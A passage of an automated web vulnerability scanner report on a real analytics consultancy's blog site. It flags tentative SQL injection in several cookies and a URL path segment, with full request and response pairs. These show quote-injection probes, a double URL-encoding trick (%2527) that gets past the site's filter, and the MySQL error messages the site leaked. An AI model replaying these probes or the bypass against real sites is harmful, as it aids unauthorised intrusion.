Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:22:46 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:22:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26267


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:22:47 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.86. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:04:40 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:04:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:04:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.87. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:10:25 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:10:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html?type=atom&start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:10:25 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.88. http://www.analyticspros.com/blog/googleanalytics/106-google-analytics-health-check.html [ki_u cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/106-google-analytics-health-check.html

Issue detail

The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:14:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:14:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
sn't because of an inherent problem with Google Analytics, but rather a problem with how it has been implemented on the site in question... The most common mistake for implementing Google Analytics is failing to configure the tracking tags for your particular site... This is a pervasive problem because it's really easy to get started with Google Analytics using the <em>
...[SNIP]...

Request 2

GET /blog/googleanalytics/106-google-analytics-health-check.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=5
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:14:22 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

1.89. http://www.analyticspros.com/blog/googleanalytics/109-google-analytics-training-san-jose-2010.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:20 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/109-google-analytics-training-san-jose-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.90. http://www.analyticspros.com/blog/googleanalytics/113-domain-hostname-content-reports.html [ki_t cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/113-domain-hostname-content-reports.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:46:26 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/113-domain-hostname-content-reports.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:46:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:46:40 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:46:41 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.91. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 05:56:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 05:56:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /blog%2527%2527/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:56:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.92. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:38:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

